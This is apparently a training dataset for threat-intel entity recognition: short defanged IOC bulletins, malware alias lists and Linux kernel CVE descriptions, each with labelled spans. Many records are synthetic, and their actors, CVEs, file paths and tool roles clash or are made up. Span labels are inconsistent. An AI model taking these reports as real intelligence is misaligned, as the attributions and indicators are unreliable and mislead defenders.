{"text": "IOC Bulletin - SmokeLoader Campaign:\nNetwork Indicators:\n- 118 [ . ] 245 [ . ] 209 [ . ] 222\n- 20 [ . ] 121 [ . ] 223 [ . ] 88\n- 5 [ . ] 17 [ . ] 46 [ . ] 179\n- staticmail[ . ]club\n- relaynode[ . ]xyz\nURLs:\n- hxxps://cachecloud[.]site/api/v2/auth\n- hxxp://apilogin[.]top/login\nEmail Senders:\n- contact@identity-verify[ . ]cc\n- alert@urgent-notice[.]online\nFile Indicators:\n- SHA256: 0a15bd5951703f091bd9efc7ca0720d1173973a627624c704fe12d231461e0f4\n- SHA256: 0e0aa25ec710d059739c30dd0662252817cd8f33c114157c66830f53b70a5b9f\n- Drop path: /opt/app/bin/helper.sh", "spans": {"Malware: SmokeLoader": [[15, 26]], "Indicator: 118.245.209.222": [[59, 92]], "Indicator: 20.121.223.88": [[95, 126]], "Indicator: 5.17.46.179": [[129, 158]], "Indicator: staticmail.club": [[161, 180]], "Indicator: relaynode.xyz": [[183, 200]], "Indicator: hxxps://cachecloud.site/api/v2/auth": [[209, 246]], "Indicator: http://apilogin.top/login": [[249, 276]], "Indicator: contact@identity-verify.cc": [[294, 324]], "Indicator: alert@urgent-notice.online": [[327, 355]], "Indicator: 0a15bd5951703f091bd9efc7ca0720d1173973a627624c704fe12d231461e0f4": [[383, 447]], "Indicator: 0e0aa25ec710d059739c30dd0662252817cd8f33c114157c66830f53b70a5b9f": [[458, 522]]}, "info": {"id": "synth_v2_01470", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Royal campaign:\nStage 1 dropper at /var/tmp/taskhost.exe - SHA1: f8e95e214e3679b5d836b6292ed4f7e3cb9acc91\nStage 2 loader at /var/tmp/beacon.dll - SHA256: 7c812af944df48ca140539c161c7859d9e6133dae2cb848605149fe4122ce059\nFinal payload at /dev/shm/backdoor.elf - SHA1: 6d846d93d899729fe7bbac0619454d9e46234e20\nExfiltration module - SHA1: 63ca06c5b1e4acfdd0266369c4ce0d22318bfff4\nAll stages communicated with 10[.]30[.]174[.]190. Nmap signatures detected in Stage 2.", "spans": {"Malware: Royal": [[22, 27]], "Indicator: f8e95e214e3679b5d836b6292ed4f7e3cb9acc91": [[87, 127]], "Indicator: 7c812af944df48ca140539c161c7859d9e6133dae2cb848605149fe4122ce059": [[176, 240]], "Indicator: 6d846d93d899729fe7bbac0619454d9e46234e20": [[288, 328]], "Indicator: 63ca06c5b1e4acfdd0266369c4ce0d22318bfff4": [[357, 397]], "Indicator: 10.30.174.190": [[427, 446]]}, "info": {"id": "synth_v2_01919", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerspan: Initialize options_len before referencing options.\n\nThe struct ip_tunnel_info has a flexible array member named\noptions that is protected by a counted_by(options_len)\nattribute.\n\nThe compiler will use this information to enforce runtime bounds\nchecking deployed by FORTIFY_SOURCE string helpers.\n\nAs laid out in the GCC documentation, the counter must be\ninitialized before the first reference to the flexible array\nmember.\n\nAfter scanning through the files that use struct ip_tunnel_info\nand also refer to options or options_len, it appears the normal\ncase is to use the ip_tunnel_info_opts_set() helper.\n\nSaid helper would initialize options_len properly before copying\ndata into options, however in the GRE ERSPAN code a partial\nupdate is done, preventing the use of the helper function.\n\nBefore this change the handling of ERSPAN traffic in GRE tunnels\nwould cause a kernel panic when the kernel is compiled with\nGCC 15+ and having FORTIFY_SOURCE configured:\n\nmemcpy: detected buffer overflow: 4 byte write of buffer size 0\n\nCall Trace:\n <IRQ>\n __fortify_panic+0xd/0xf\n erspan_rcv.cold+0x68/0x83\n ? ip_route_input_slow+0x816/0x9d0\n gre_rcv+0x1b2/0x1c0\n gre_rcv+0x8e/0x100\n ? raw_v4_input+0x2a0/0x2b0\n ip_protocol_deliver_rcu+0x1ea/0x210\n ip_local_deliver_finish+0x86/0x110\n ip_local_deliver+0x65/0x110\n ? ip_rcv_finish_core+0xd6/0x360\n ip_rcv+0x186/0x1a0\n\nReported-at: hxxps://launchpad[ . ]net/bugs/2129580", "spans": {"Indicator: https://launchpad.net/bugs/2129580": [[1450, 1488]], "System: Linux kernel": [[7, 19]], "Vulnerability: buffer overflow": [[1058, 1073]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-71128"}}
{"text": "A backdoor also known as: Trojan[ . ]Crypt[ . ]ES Trojan[ . ]Crypt[ . ]ES Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan[.]Crypt[.]ES Trojan.Win32.Crypt.ewgrry Trojan[ . ]Crypt[ . ]ES Trojan[.]Crypt[.]ES BehavesLike.Win32.BadFile.lm Backdoor:Win32/Huceqoo.A Trojan.Win32.Z.Crypt.73728.BQ Trojan/Win32.Scar.C8074 Trojan[.]Crypt[.]ES BScope.Trojan.Dropper.we Trj/GdSda.A Trojan[.]Crypt[.]ES Win32/Trojan.b63", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Crypt.ES": [[26, 49], [50, 73], [117, 136], [163, 186], [187, 206], [315, 334], [372, 391]]}, "info": {"id": "cyner2_train_000412", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.GBYU-0953 W32[.]Virut[.]CF Win32/Virut.17408 PE_VIRUX.R Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Worm.Win32.Delf.579072 Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 Virus.Win32.Ramnit W32/Worm.APDA Win32/Virut.bt Virus/Win32.Virut.ce W32.Virut.lJ4T Virus.Win32.Virut.ce HEUR/Fakon.mwf Virus.Virut.14 W32/Sality.AO Virus.Win32.Virut.M", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[146, 162]]}, "info": {"id": "cyner2_train_002866", "source": "defanged_augment"}}
{"text": "CrowdStrike detected a multi-stage attack chain. The initial phishing email from report@auth-check[.]org contained a link to hxxp://secureproxy[.]live/collect. This redirected to hxxps://login-gateway[ . ]club/collect on login-backup[ . ]com. A secondary email from report@urgent-notice[.]online pointed to hxxp://syncsecure[.]online/assets/js/payload.js which delivered BatLoader. The final payload callback was hxxp://static-data[.]club/callback resolving to 192 [ . ] 213 [ . ] 38 [ . ] 171 via securenode[ . ]net.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Indicator: report@auth-check.org": [[81, 104]], "Indicator: hxxp://secureproxy.live/collect": [[125, 158]], "Indicator: https://login-gateway.club/collect": [[179, 217]], "Indicator: login-backup.com": [[221, 241]], "Indicator: report@urgent-notice.online": [[266, 295]], "Indicator: http://syncsecure.online/assets/js/payload.js": [[307, 354]], "Malware: BatLoader": [[371, 380]], "Indicator: hxxp://static-data.club/callback": [[413, 447]], "Indicator: 192.213.38.171": [[461, 493]], "Indicator: securenode.net": [[498, 516]]}, "info": {"id": "synth_v2_01846", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: BumbleBee (MD5: df5ee9ef1c10d7be6b403da2975112d7). Upon execution on SonicWall SMA, the sample creates C:\\Users\\admin\\Downloads\\svchost.exe and injects into legitimate processes. Network analysis shows beaconing to 209 [ . ] 201 [ . ] 20 [ . ] 89 every 60 seconds and DNS queries to relaycache[.]live. The second stage was fetched from hxxps://portal-gateway[ . ]top/wp-content/uploads/doc.php and written to /opt/app/bin/taskhost.exe. The payload uses Burp Suite-style techniques for defense evasion. A secondary hash (SHA1: 98a9aba421b7fcbc90318065dc0b2b1883d01c51) was extracted from the unpacked payload.", "spans": {"Malware: BumbleBee": [[25, 34]], "Indicator: df5ee9ef1c10d7be6b403da2975112d7": [[41, 73]], "System: SonicWall SMA": [[94, 107]], "Indicator: 209.201.20.89": [[240, 271]], "Indicator: relaycache.live": [[308, 325]], "Indicator: hxxps://portal-gateway.top/wp-content/uploads/doc.php": [[361, 418]], "Indicator: 98a9aba421b7fcbc90318065dc0b2b1883d01c51": [[551, 591]]}, "info": {"id": "synth_v2_00510", "source": "defanged_augment"}}
{"text": "Blog Post by Tenable: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-26049 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from service@secure-verify[ . ]net delivering Play. Post-compromise, the attackers deploy ShadowPad and use PsExec for reconnaissance. C2 infrastructure includes 172 [ . ] 84 [ . ] 0 [ . ] 244 and nodeapi[ . ]top. A staging server at hxxps://logincache[ . ]xyz/collect hosts additional tooling. Key artifact: /etc/cron.d/update.dll (SHA1: 62f7316c6465a4675d457101dd9a70c5db65c6df).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2020-26049": [[127, 141]], "System: Atlassian Confluence": [[150, 170]], "Indicator: service@secure-verify.net": [[246, 275]], "Malware: Play": [[287, 291]], "Malware: ShadowPad": [[331, 340]], "Indicator: 172.84.0.244": [[403, 433]], "Indicator: nodeapi.top": [[438, 453]], "Indicator: hxxps://logincache.xyz/collect": [[475, 509]], "Indicator: 62f7316c6465a4675d457101dd9a70c5db65c6df": [[580, 620]]}, "info": {"id": "synth_v2_01691", "source": "defanged_augment"}}
{"text": "QakBot C2 server 178[.]62[.]3[.]223 was first observed on 2026-02-17 communicating over port 443. A second QakBot command-and-control node at 27[.]133[.]154[.]218:443 appeared on 2026-03-04. Both servers are hosted on commercial VPS infrastructure and use TLS encryption to evade detection.", "spans": {"Malware: QakBot": [[0, 6], [107, 113]], "Indicator: 178.62.3.223": [[17, 35]], "Indicator: 27.133.154.218": [[142, 162]]}, "info": {"id": "otx_00003", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Redrac.A@mm Win32.Redrac.A@mm Win32.Redrac.A@mm Trojan.Win32.Redrac.enor W32.Redrac@mm Win32/Redrac.A Email-Worm.Win32.Redrac Win32.Redrac.A@mm Worm.Redrac!vQPr8wluFnM W32.W.Redrac!c Win32.Redrac.A@mm Worm.Win32.Redrac.A Win32.Redrac.A@mm Win32.HLLM.Redrac Worm.Redrac.Win32.1 BehavesLike[ . ]Win32[ . ]AdwareRBlast[ . ]cc W32/Redrac.AFIQ-7566 Worm/Sramota.axa WORM/Redrac.A Worm[Email]/Win32.Redrac Win32.Redrac.E90817 Trojan/Win32.Xema Worm:Win32/Redrac.A@mm Virus.Win32.Heur.l W32/Gnome.C.worm Win32.Redrac.A@mm I-Worm/Redrac.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.AdwareRBlast.cc": [[309, 354]]}, "info": {"id": "cyner2_train_006407", "source": "defanged_augment"}}
{"text": "Internal name : snd[.]dll File format : PE32 DLL MD5: 8c4d896957c36ec4abeb07b2802268b9 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.24 12:07:27 ( GMT ) Exported functions :", "spans": {"Indicator: snd.dll": [[16, 25]], "Indicator: 8c4d896957c36ec4abeb07b2802268b9": [[54, 86]], "Organization: Microsoft": [[111, 120]]}, "info": {"id": "cyberner_stix_train_007986", "source": "defanged_augment"}}
{"text": "APT29 used Rubeus for credential dumping and BloodHound for lateral movement. Credentials were exfiltrated to 151 [ . ] 90 [ . ] 165 [ . ] 131. The attacker pivoted to 181[.]174[.]252[.]216 and dropped C:\\Windows\\Temp\\procdump64.exe (MD5: a3889edbfc83694edfd257f9b0b7d090). C2 traffic was routed through fast-cdn[[ . ]]xyz.", "spans": {"Indicator: 151.90.165.131": [[110, 142]], "Indicator: 181.174.252.216": [[168, 189]], "Indicator: a3889edbfc83694edfd257f9b0b7d090": [[239, 271]], "Indicator: fast-cdn[.]xyz": [[304, 322]]}, "info": {"id": "synth_00057", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-44676 is a critical use-after-free affecting Windows 11. FBI confirmed active exploitation by Forest Blizzard in the wild. Exploitation delivers BatLoader (SHA1: 94b48ca18ad4d8cd33111a1921277cca12b27f3e) which is dropped to /home/user/.config/shell.php. The exploit payload is hosted at hxxp://storage-gateway[ . ]org/assets/js/payload.js and communicates to 147 [ . ] 136 [ . ] 127 [ . ] 60 for C2.", "spans": {"Vulnerability: CVE-2026-44676": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: Windows 11": [[78, 88]], "Organization: FBI": [[90, 93]], "Malware: BatLoader": [[178, 187]], "Indicator: 94b48ca18ad4d8cd33111a1921277cca12b27f3e": [[195, 235]], "Indicator: hxxp://storage-gateway.org/assets/js/payload.js": [[320, 371]], "Indicator: 147.136.127.60": [[392, 424]]}, "info": {"id": "synth_v2_00735", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba[.]be Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Tinba.dqteol TrojWare[.]Win32[.]Roitamit[.]BE Trojan.PWS.Tinba.153 Trojan.Tinba.Win32.1916 TR/Crypt.ZPACK.137753 Trojan/Win32.Skeeyah.R216296 Trojan.Tinba Win32/Tinba[ . ]BE Trojan.Tinba!GN4G+jbMfD0 Trojan.Win32.Tinba W32/Tinba[ . ]BE!tr Win32/Trojan.6ed", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Tinba.be": [[50, 60]], "Indicator: TrojWare.Win32.Roitamit.BE": [[130, 162]], "Indicator: Tinba.BE": [[278, 290], [339, 351]]}, "info": {"id": "cyner2_train_003961", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Ransom.Exxroute.A3 Trojan.Ransom.Lukitos.1 Ransom_CERBER.SM37 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Ramnit!dr Ransom_CERBER.SM37 Trojan.PWS.Sphinx.2 BehavesLike[.]Win32[.]Ransomware[.]cc Trojan:Win32/CeeInject.MJ!bit Trojan/Win32.Fareit.R189070 Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Ransomware.cc": [[184, 221]]}, "info": {"id": "cyner2_train_004471", "source": "defanged_augment"}}
{"text": "Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort[ . ]org . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": {"Organization: we": [[364, 366]], "Organization: banking": [[529, 536]], "Indicator: Snort.org": [[130, 143]]}, "info": {"id": "cyberner_stix_train_004430", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at C:\\ProgramData\\loader.exe. Memory dump analysis confirmed execution of Impacket. Registry modifications pointed to persistence via /usr/local/bin/payload.bin. Network forensics identified connections to 115[.]156[.]83[.]41 and proxyproxy[.]link. Email headers traced the initial vector to it@login-portal[ . ]tech. File /var/tmp/runtime.dll (MD5: 85a1466e4e86f82b6d0fe8baa0dc4781) was identified as the initial dropper. A staging URL hxxp://secure-secure[ . ]site/assets/js/payload.js resolved to 192[.]165[.]213[.]176. Secondary artifact hash: SHA1: 9fbafb71b8fccb96f76d8d18debe2e07d6de6604.", "spans": {"Indicator: 115.156.83.41": [[295, 314]], "Indicator: proxyproxy.link": [[319, 336]], "Indicator: it@login-portal.tech": [[381, 405]], "Indicator: 85a1466e4e86f82b6d0fe8baa0dc4781": [[439, 471]], "Indicator: hxxp://secure-secure.site/assets/js/payload.js": [[526, 576]], "Indicator: 192.165.213.176": [[589, 610]], "Indicator: 9fbafb71b8fccb96f76d8d18debe2e07d6de6604": [[643, 683]]}, "info": {"id": "synth_v2_01210", "source": "defanged_augment"}}
{"text": "But some clues , such as the existence of a hidden menu for operator control , point to a manual installation method – the attackers used physical access to a victim ’ s device to install the malware . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89[.]34[.]237[.]118 808 hxxp://89[.]34[.]237[.]118:808/Rar32.exe . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"Organization: aerospace": [[333, 342]], "Organization: telecommunications": [[345, 363]], "Organization: finance industries": [[370, 388]], "Indicator: 89.34.237.118 808": [[517, 540]], "Indicator: http://89.34.237.118:808/Rar32.exe": [[541, 581]], "Malware: fake / rogue anti - virus products": [[676, 710]]}, "info": {"id": "cyberner_stix_train_000574", "source": "defanged_augment"}}
{"text": "The message was sent from an account created under her name on lesser known email provider 1 1's Mail[ . ]com, a common tactic in recent months, with a link to a file hosted on Dropbox and an additional credential phishing attempt.", "spans": {"System: email provider": [[76, 90]], "Organization: Dropbox": [[177, 184]], "Indicator: Mail.com": [[97, 109]]}, "info": {"id": "cyner2_train_003219", "source": "defanged_augment"}}
{"text": "Figure 8 . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . The malicious DLL exports the same function names as the original mcvsocfg[.]dll library . HHS HC3 warned that the stolen credentials may have been used to compromise a number of healthcare organizations and enterprises in other industries .", "spans": {"Organization: military": [[178, 186]], "Organization: commercial": [[191, 201]], "Indicator: mcvsocfg.dll": [[277, 291]], "Organization: HHS HC3": [[302, 309]], "Organization: healthcare organizations": [[390, 414]], "Organization: enterprises in other industries": [[419, 450]]}, "info": {"id": "cyberner_stix_train_000061", "source": "defanged_augment"}}
{"text": "Powerview[ . ]ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework .", "spans": {"Indicator: Powerview.ps1": [[0, 17]]}, "info": {"id": "cyberner_stix_train_003560", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`. This is because the implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc) does not validate all constraints specified in the op's contract(hxxps://www[ . ]tensorflow[ . ]org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc": [[242, 381]], "Indicator: https://www.tensorflow.org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization": [[448, 551]], "Vulnerability: denial of service": [[130, 147]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29548"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/io-wq: Use set_bit() and test_bit() at worker->flags\n\nUtilize set_bit() and test_bit() on worker->flags within io_uring/io-wq\nto address potential data races.\n\nThe structure io_worker->flags may be accessed through various data\npaths, leading to concurrency issues. When KCSAN is enabled, it reveals\ndata races occurring in io_worker_handle_work and\nio_wq_activate_free_worker functions.\n\n\t BUG: KCSAN: data-race in io_worker_handle_work / io_wq_activate_free_worker\n\t write to 0xffff8885c4246404 of 4 bytes by task 49071 on cpu 28:\n\t io_worker_handle_work (io_uring/io-wq.c:434 io_uring/io-wq.c:569)\n\t io_wq_worker (io_uring/io-wq.c:?)\n<snip>\n\n\t read to 0xffff8885c4246404 of 4 bytes by task 49024 on cpu 5:\n\t io_wq_activate_free_worker (io_uring/io-wq.c:? io_uring/io-wq.c:285)\n\t io_wq_enqueue (io_uring/io-wq.c:947)\n\t io_queue_iowq (io_uring/io_uring.c:524)\n\t io_req_task_submit (io_uring/io_uring.c:1511)\n\t io_handle_tw_list (io_uring/io_uring.c:1198)\n<snip>\n\nLine numbers against commit 18daea77cca6 (\"Merge tag 'for-linus' of\ngit://git[.]kernel[.]org/pub/scm/virt/kvm/kvm\").\n\nThese races involve writes and reads to the same memory location by\ndifferent tasks running on different CPUs. To mitigate this, refactor\nthe code to use atomic operations such as set_bit(), test_bit(), and\nclear_bit() instead of basic \"and\" and \"or\" operations. This ensures\nthread-safe manipulation of worker flags.\n\nAlso, move `create_index` to avoid holes in the structure.", "spans": {"Indicator: git.kernel.org": [[1116, 1134]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-39508"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid use f2fs_bug_on() in f2fs_new_node_page()\n\nAs Dipanjan Das <mail.dipanjan.das@gmail[ . ]com> reported, syzkaller\nfound a f2fs bug as below:\n\nRIP: 0010:f2fs_new_node_page+0x19ac/0x1fc0 fs/f2fs/node.c:1295\nCall Trace:\n write_all_xattrs fs/f2fs/xattr.c:487 [inline]\n __f2fs_setxattr+0xe76/0x2e10 fs/f2fs/xattr.c:743\n f2fs_setxattr+0x233/0xab0 fs/f2fs/xattr.c:790\n f2fs_xattr_generic_set+0x133/0x170 fs/f2fs/xattr.c:86\n __vfs_setxattr+0x115/0x180 fs/xattr.c:182\n __vfs_setxattr_noperm+0x125/0x5f0 fs/xattr.c:216\n __vfs_setxattr_locked+0x1cf/0x260 fs/xattr.c:277\n vfs_setxattr+0x13f/0x330 fs/xattr.c:303\n setxattr+0x146/0x160 fs/xattr.c:611\n path_setxattr+0x1a7/0x1d0 fs/xattr.c:630\n __do_sys_lsetxattr fs/xattr.c:653 [inline]\n __se_sys_lsetxattr fs/xattr.c:649 [inline]\n __x64_sys_lsetxattr+0xbd/0x150 fs/xattr.c:649\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0\n\nNAT entry and nat bitmap can be inconsistent, e.g. one nid is free\nin nat bitmap, and blkaddr in its NAT entry is not NULL_ADDR, it\nmay trigger BUG_ON() in f2fs_new_node_page(), fix it.", "spans": {"Indicator: gmail.com": [[166, 179]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50013"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ni40e: Fix kernel crash during reboot when adapter is in recovery mode\n\nIf the driver detects during probe that firmware is in recovery\nmode then i40e_init_recovery_mode() is called and the rest of\nprobe function is skipped including pci_set_drvdata(). Subsequent\ni40e_shutdown() called during shutdown/reboot dereferences NULL\npointer as pci_get_drvdata() returns NULL.\n\nTo fix call pci_set_drvdata() also during entering to recovery mode.\n\nReproducer:\n1) Lets have i40e NIC with firmware in recovery mode\n2) Run reboot\n\nResult:\n[  139.084698] i40e: Intel(R) Ethernet Connection XL710 Network Driver\n[  139.090959] i40e: Copyright (c) 2013 - 2019 Intel Corporation.\n[  139.108438] i40e 0000:02:00.0: Firmware recovery mode detected. Limiting functionality.\n[  139.116439] i40e 0000:02:00.0: Refer to the Intel(R) Ethernet Adapters and Devices User Guide for details on firmware recovery mode.\n[  139.129499] i40e 0000:02:00.0: fw 8.3.64775 api 1.13 nvm 8.30 0x8000b78d 1.3106.0 [8086:1583] [15d9:084a]\n[  139.215932] i40e 0000:02:00.0 enp2s0f0: renamed from eth0\n[  139.223292] i40e 0000:02:00.1: Firmware recovery mode detected. Limiting functionality.\n[  139.231292] i40e 0000:02:00.1: Refer to the Intel(R) Ethernet Adapters and Devices User Guide for details on firmware recovery mode.\n[  139.244406] i40e 0000:02:00.1: fw 8.3.64775 api 1.13 nvm 8.30 0x8000b78d 1.3106.0 [8086:1583] [15d9:084a]\n[  139.329209] i40e 0000:02:00.1 enp2s0f1: renamed from eth0\n...\n[  156.311376] BUG: kernel NULL pointer dereference, address: 00000000000006c2\n[  156.318330] #PF: supervisor write access in kernel mode\n[  156.323546] #PF: error_code(0x0002) - not-present page\n[  156.328679] PGD 0 P4D 0\n[  156.331210] Oops: 0002 [#1] PREEMPT SMP NOPTI\n[  156.335567] CPU: 26 PID: 15119 Comm: reboot Tainted: G            E      6.2.0+ #1\n[  156.343126] Hardware name: Abacus electric, s.r.o. - servis@abacus[ . ]cz Super Server/H12SSW-iN, BIOS 2.4 04/13/2022\n[  156.353369] RIP: 0010:i40e_shutdown+0x15/0x130 [i40e]\n[  156.358430] Code: c1 fc ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 55 48 89 fd 53 48 8b 9f 48 01 00 00 <f0> 80 8b c2 06 00 00 04 f0 80 8b c0 06 00 00 08 48 8d bb 08 08 00\n[  156.377168] RSP: 0018:ffffb223c8447d90 EFLAGS: 00010282\n[  156.382384] RAX: ffffffffc073ee70 RBX: 0000000000000000 RCX: 0000000000000001\n[  156.389510] RDX: 0000000080000001 RSI: 0000000000000246 RDI: ffff95db49988000\n[  156.396634] RBP: ffff95db49988000 R08: ffffffffffffffff R09: ffffffff8bd17d40\n[  156.403759] R10: 0000000000000001 R11: ffffffff8a5e3d28 R12: ffff95db49988000\n[  156.410882] R13: ffffffff89a6fe17 R14: ffff95db49988150 R15: 0000000000000000\n[  156.418007] FS:  00007fe7c0cc3980(0000) GS:ffff95ea8ee80000(0000) knlGS:0000000000000000\n[  156.426083] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  156.431819] CR2: 00000000000006c2 CR3: 00000003092fc005 CR4: 0000000000770ee0\n[  156.438944] PKRU: 55555554\n[  156.441647] Call Trace:\n[  156.444096]  <TASK>\n[  156.446199]  pci_device_shutdown+0x38/0x60\n[  156.450297]  device_shutdown+0x163/0x210\n[  156.454215]  kernel_restart+0x12/0x70\n[  156.457872]  __do_sys_reboot+0x1ab/0x230\n[  156.461789]  ? vfs_writev+0xa6/0x1a0\n[  156.465362]  ? __pfx_file_free_rcu+0x10/0x10\n[  156.469635]  ? __call_rcu_common.constprop.85+0x109/0x5a0\n[  156.475034]  do_syscall_64+0x3e/0x90\n[  156.478611]  entry_SYSCALL_64_after_hwframe+0x72/0xdc\n[  156.483658] RIP: 0033:0x7fe7bff37ab7", "spans": {"Indicator: servis@abacus.cz": [[1947, 1967]], "System: Linux kernel": [[7, 19]], "Organization: Intel": [[619, 624], [716, 721], [873, 878], [1270, 1275]], "Vulnerability: NULL pointer dereference": [[1560, 1584]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53114"}}
{"text": "Multiple Ryuk samples identified:\n- SHA256: 75d25a29646de86ae604bf927fefdba5af3d3d04b806bf8be3ab4f0fd9bfb0d0\n- SHA256: eaed36f53105a93364c678de8fd8560673f4cb5c300594540bfc0c7c7e29bd01\n- MD5: 82752ae2f5d6008330bcc2d4cab188b2\n- MD5: eefcb459329b2a8358f28e4833326f5e\nAll samples beacon to 185 [ . ] 169 [ . ] 50 [ . ] 103 and fast-cdn[[ . ]]xyz.", "spans": {"Malware: Ryuk": [[9, 13]], "Indicator: 75d25a29646de86ae604bf927fefdba5af3d3d04b806bf8be3ab4f0fd9bfb0d0": [[44, 108]], "Indicator: eaed36f53105a93364c678de8fd8560673f4cb5c300594540bfc0c7c7e29bd01": [[119, 183]], "Indicator: 82752ae2f5d6008330bcc2d4cab188b2": [[191, 223]], "Indicator: eefcb459329b2a8358f28e4833326f5e": [[231, 263]], "Indicator: 185.169.50.103": [[286, 318]], "Indicator: fast-cdn[.]xyz": [[323, 341]]}, "info": {"id": "synth_00056", "source": "defanged_augment"}}
{"text": "Blog Post by Tenable: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-24373 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from service@secure-verify[ . ]net delivering TrickBot. Post-compromise, the attackers deploy BumbleBee and use Sliver for reconnaissance. C2 infrastructure includes 192 [ . ] 95 [ . ] 237 [ . ] 112 and syncedge[ . ]org. A staging server at hxxps://cloudmail[ . ]com/gate.php hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\csrss.exe (SHA1: d9b08c98352efc57e7a6bfeccf68f795c452f86f).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2025-24373": [[123, 137]], "System: Progress Telerik": [[146, 162]], "Indicator: service@secure-verify.net": [[238, 267]], "Malware: TrickBot": [[279, 287]], "Malware: BumbleBee": [[327, 336]], "Indicator: 192.95.237.112": [[399, 431]], "Indicator: syncedge.org": [[436, 452]], "Indicator: hxxps://cloudmail.com/gate.php": [[474, 508]], "Indicator: d9b08c98352efc57e7a6bfeccf68f795c452f86f": [[596, 636]]}, "info": {"id": "synth_v2_01621", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-27546 is a critical privilege escalation affecting Windows 11. SentinelOne confirmed active exploitation by OilRig in the wild. Exploitation delivers XLoader (SHA1: d1695472df975d7ad4802c5d249cd422d6a89470) which is dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\chrome_helper.exe. The exploit payload is hosted at hxxps://cachecache[.]com/callback and communicates to 19[.]17[.]30[.]105 for C2.", "spans": {"Vulnerability: CVE-2024-27546": [[24, 38]], "Vulnerability: privilege escalation": [[53, 73]], "System: Windows 11": [[84, 94]], "Organization: SentinelOne": [[96, 107]], "Malware: XLoader": [[183, 190]], "Indicator: d1695472df975d7ad4802c5d249cd422d6a89470": [[198, 238]], "Indicator: hxxps://cachecache.com/callback": [[346, 379]], "Indicator: 19.17.30.105": [[400, 418]]}, "info": {"id": "synth_v2_00797", "source": "defanged_augment"}}
